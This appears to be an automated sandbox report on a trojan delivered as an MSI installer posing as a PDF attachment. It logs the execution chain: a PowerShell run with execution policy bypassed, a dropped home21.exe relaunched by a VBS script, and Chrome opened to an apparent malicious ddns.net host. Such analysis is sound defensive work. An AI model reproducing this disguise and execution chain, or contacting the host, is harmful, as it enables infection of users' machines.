Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	HTTPS traffic detected: 20.42.73.29:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.111.168.85:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.4:49827 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:
Source: home21.exe.3.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\home21.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6dba16.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBB00.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBB6F.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBBBE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBBDE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{B68A296D-3AC1-440D-8DF0-1D645D15B8C2}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBC2D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIBC4E.tmp	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIBB00.tmp

Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Windows\Installer\MSIBB00.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD

Source: home21.exe.3.dr

Static PE information: Number of sections : 19 > 10

Source: hANEXOPDF.PDF40 234057.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs hANEXOPDF.PDF40 234057.msi
Source: hANEXOPDF.PDF40 234057.msi	Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs hANEXOPDF.PDF40 234057.msi

Source: home21.exe.3.dr	Static PE information: Section: ZLIB complexity 0.98944091796875
Source: home21.exe.3.dr	Static PE information: Section: ZLIB complexity 0.9931242028061225
Source: home21.exe.3.dr	Static PE information: Section: ZLIB complexity 0.9928385416666666
Source: home21.exe.3.dr	Static PE information: Section: ZLIB complexity 1.0045572916666667
Source: home21.exe.3.dr	Static PE information: Section: ZLIB complexity 0.9993225164654226
Source: home21.exe.3.dr	Static PE information: Section: .reloc ZLIB complexity 1.5

Source: classification engine

Classification label: mal100.troj.evad.winMSI@28/107@23/14

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\home21.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Users\Public\Documents\home21.exe	Mutant created: \Sessions\1\BaseNamedObjects\brkurschmogesk-fdsfsdfsd

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF8830F0CE2430F0EE.TMP

Jump to behavior

Source: Yara match

File source: 00000006.00000003.1861648679.0000000009DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs"

Source: C:\Users\Public\Documents\home21.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hANEXOPDF.PDF40 234057.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\home21.exe "C:\Users\Public\Documents\home21.exe"
Source: C:\Users\Public\Documents\home21.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://winhomemodulo.ddns.net/w2/
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2096,i,1416669243780171068,6153319539706403658,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\DiavcthD.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\Public\Documents\home21.exe "C:\Users\Public\Documents\home21.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CE2D7E5D3114F90E94C35CC7545C98DA	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssBC6B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiBC58.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrBC59.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrBC5A.txt" -propSep " :<->: " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\home21.exe "C:\Users\Public\Documents\home21.exe"	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://winhomemodulo.ddns.net/w2/	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2096,i,1416669243780171068,6153319539706403658,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\Public\Documents\home21.exe	Section loaded: userenv.dll	Jump to behavior
